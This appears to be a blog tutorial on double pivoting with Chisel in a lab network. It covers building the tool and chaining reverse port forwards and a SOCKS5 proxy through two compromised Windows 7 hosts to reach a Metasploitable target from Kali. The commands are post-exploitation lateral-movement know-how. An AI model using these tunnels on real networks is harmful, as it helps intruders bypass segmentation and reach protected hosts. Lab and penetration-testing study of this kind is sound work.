Double pivoting with Chisel

0

hello folks

in this topic, we will talk about a sensitive thing what if you got a shell on the machine but there aren’t SSH client or server and also you don’t have Meterpreter to run autoroute and start pivoting so today I will talk about chisel is best tools I like for pivoting you can read about it here

https://github.com/jpillora/chisel

and let’s go

at first, when you start to use git clone command you will download the binaries files for chisel (chisel is written by (go) language ) and it needs to build it for each specific OS here is instructions

https://gist.github.com/asukakenji/f15ba7e588ac42795f421b48b8aede63#a-list-of-valid-goarch-values

this is files after clone it from GitHub

then we start to build chisel

to build it we have one command

#GOOS=windows GOARCH=386 go build

\\GOOS =” OS” GOARCH=” ARCH of OS” go build

386= 32bit | amd64 =64

and you can choose your os such as Windows and Linux etc. all details in the link below

https://gist.github.com/asukakenji/f15ba7e588ac42795f421b48b8aede63#a-list-of-valid-goarch-values

there is an example here for windows platform

#upx brute chisel

“ This is option command if you need to reduce size of the tool ”
here we finish the first part how to build chisel


after building it and reducing the size 

let’s begin our lab at first we will try double port forwarding 🙂 and don’t forget here I do not care about the exploitation method or how you will transfer tools to targets this is your responsibility I am just will show you some tricks for pivoting
our topology will same this photo

about IP’s of machines

our machine Kali Linux assuming as an attacker has IP = 192.168.40.128

the next win7 is assuming as first pivot point have 2nic first IP is =192.168.40.130 2nd IP is = 192.168.30.130

the next win7 is assuming as second pivot point have 2nic first IP is =192.168.30.131 2nd IP is = 192.168.20.131

and at last, our target metasploitable have only one IP = 192.168.20.128


let’s start

we will run chisel as a server on first pivot PC

# chisel server -p 8888 -reverse

then we will access to chisel server from second pivot pc and start remote port forward

#chisel client 192.168.30.130:8888 R:9001:192.168.20.128:80

here from pivot pc2 I take the port 80 from metasploitable that I can access in my network (192.168.20.128) and make a tunnel to the server (pivot pc 1) via port 9001 and now first pivot point can access HTTP of metasploitable via port 9001 locally

now we can do the same between attacker machine and pc1 pivot point via make remote port tunneling and send port 9001 to other local port on kali

so at first let’s run chisel as a server on kali

 

and now let’s connect from pc1 first pivot point

chisel client 192.168.40.128:8000 R:8001:127.0.0.1:9001

and now we have done

and here we finish port forward 🙂


now, what about dynamic port forward and use it with proxy chains 😉

let’s start run chisel as a server and use option –socks5

connect to the server via client and specify local port 9999 for proxy chains

and run another chisel as a server to start a connection with next pc (pivot-pc2)

here we run chisel as a client and choose port 8888 to be a local port for the proxy

now let’s configure our proxy chains config file

let’s try to scan our metasploitable and it works successfully

now we are finish

 

special thanks for EBRAHIM KHADI AND ESLAM MEDHAT

 

Leave A Reply

Your email address will not be published.